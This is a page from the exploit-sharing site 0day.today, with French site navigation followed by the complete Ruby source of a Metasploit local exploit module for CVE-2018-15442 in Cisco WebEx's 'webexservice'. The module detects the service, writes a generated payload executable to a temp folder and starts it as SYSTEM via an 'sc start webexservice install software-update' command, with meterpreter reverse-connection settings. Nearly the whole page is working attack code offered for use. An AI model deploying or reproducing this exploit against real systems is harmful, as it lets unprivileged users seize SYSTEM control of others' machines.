0day.today - La plus grande base de données de Exploit dans le monde.
![](/img/logo_green.jpg)
Nous utilisons un domaine DOMAIN_LINK
Si vous voulez acheter un exploit ou payer un service vous avez besoins d'Or. Nous ne voulons pas que notre site soit utiliser comme outil de piratage , de sorte que touts types d'actions qui pourrais affecter illegalement d'autres utilisateurs ou sites web ou vous n'avez pas l'autorisation vous serez bannit et votre compte ainsi que vos donnees seront supprimees.
Les administrateur de 0day.today utilises des moyens de contacts officiels. Mefiez-vous des imposteurs!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Lire le [ J'accepte ]
- Lire le [ Envoyer ] Regles
- Visiter le [ faq ] page
- [ Enregistrement ] profil
- Obtenir [ GOLD ]
- Si vous voulez [ vendre ]
- Si vous voulez [ acheter ]
- Si vous vous perdez [ Compte ]
- Une questions [ [email protected] ]
- Connexion
- Page d'enregistrement
- Restauration de compte
- Foire aux questions
- Contactez-nous
- Regle de publication
- Page de contrat
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Vous pouvez nous contacter par:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WebEx Local Service Permissions Code Execution Exploit
Auteur
Risque
![](/img/risk/critlow_3.gif)
Security Risk High
]0day-ID
Catégorie
Date d'ajout
CVE
Plateforme
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Services include Msf::Post::Windows::Accounts def initialize(info={}) super( update_info( info, 'Name' => 'WebEx Local Service Permissions Exploit', 'Description' => %q{ This module exploits a flaw in the 'webexservice' Windows service, which runs as SYSTEM, can be used to run arbitrary commands locally, and can be started by limited users in default installations. }, 'References' => [ ['URL', 'https://webexec.org'], ['CVE', '2018-15442'] ], 'DisclosureDate' => "Oct 09 2018", 'License' => MSF_LICENSE, 'Author' => [ 'Jeff McJunkin <jeff.mcjunkin[at]gmail.com>' ], 'Platform' => [ 'win'], 'Targets' => [ [ 'Automatic', {} ], [ 'Windows x86', { 'Arch' => ARCH_X86 } ], [ 'Windows x64', { 'Arch' => ARCH_X64 } ] ], 'SessionTypes' => [ "meterpreter" ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'WfsDelay' => 5, 'ReverseConnectRetries' => 255 }, 'DefaultTarget' => 0 )) register_options([ OptString.new("DIR", [ false, "Specify a directory to plant the EXE.", "%SystemRoot%\\Temp"]) ]) @service_name = 'webexservice' end def validate_arch return target unless target.name == 'Automatic' case sysinfo['Architecture'] when 'x86' fail_with(Failure::BadConfig, 'Invalid payload architecture') if payload_instance.arch.first == 'x64' vprint_status('Detected x86 system') return targets[1] when 'x64' vprint_status('Detected x64 system') return targets[2] end end def check_service_exists?(service) srv_info = service_info(service) if srv_info.nil? vprint_warning("Unable to enumerate services.") return false end if srv_info && srv_info[:display].empty? vprint_warning("Service #{service} does not exist.") return false else return true end end def check unless check_service_exists?(@service_name) return Exploit::CheckCode::Safe end srv_info = service_info(@service_name) vprint_status(srv_info.to_s) case START_TYPE[srv_info[:starttype]] when 'Disabled' vprint_error("Service startup is Disabled, so will be unable to exploit unless account has correct permissions...") return Exploit::CheckCode::Safe when 'Manual' vprint_error("Service startup is Manual, so will be unable to exploit unless account has correct permissions...") return Exploit::CheckCode::Safe when 'Auto' vprint_good("Service is set to Automatically start...") end if check_search_path return Exploit::CheckCode::Safe end return Exploit::CheckCode::Appears end def check_write_access(path) perm = check_dir_perms(path, @token) if perm and perm.include?('W') print_good("Write permissions in #{path} - #{perm}") return true elsif perm vprint_status ("Permissions for #{path} - #{perm}") else vprint_status ("No permissions for #{path}") end return false end def exploit begin @token = get_imperstoken rescue Rex::Post::Meterpreter::RequestError vprint_error("Error while using get_imperstoken: #{e}") end fail_with(Failure::Unknown, "Unable to retrieve token.") unless @token if is_system? fail_with(Failure::Unknown, "Current user is already SYSTEM, aborting.") end print_status("Checking service exists...") if !check_service_exists?(@service_name) fail_with(Failure::NoTarget, "The service doesn't exist.") end if is_uac_enabled? print_warning("UAC is enabled, may get false negatives on writable folders.") end # Use manually selected Dir file_path = datastore['DIR'] @exe_file_name = Rex::Text.rand_text_alphanumeric(8) @exe_file_path = "#{file_path}\\#{@exe_file_name}.exe" service_information = service_info(@service_name) # Check architecture valid_arch = validate_arch exe = generate_payload_exe(:arch => valid_arch.arch) # # Drop the malicious executable into the path # print_status("Writing #{exe.length.to_s} bytes to #{@exe_file_path}...") begin write_file(@exe_file_path, exe) register_file_for_cleanup(@exe_file_path) rescue Rex::Post::Meterpreter::RequestError => e # Can't write the file, can't go on fail_with(Failure::Unknown, e.message) end # # Run the service # print_status("Launching service...") res = cmd_exec("cmd.exe", "/c sc start webexservice install software-update 1 #{@exe_file_path}") if service_restart(@service_name) print_status("Service started...") else service_information = service_info(@service_name) if service_information[:starttype] == START_TYPE_AUTO if job_id print_status("Unable to start service, handler running waiting for a reboot...") while(true) break if session_created? select(nil,nil,nil,1) end else fail_with(Failure::Unknown, "Unable to start service, use exploit -j to run as a background job and wait for a reboot...") end else fail_with(Failure::Unknown, "Unable to start service, and it does not auto start, cleaning up...") end end end end # 0day.today [2024-06-30] #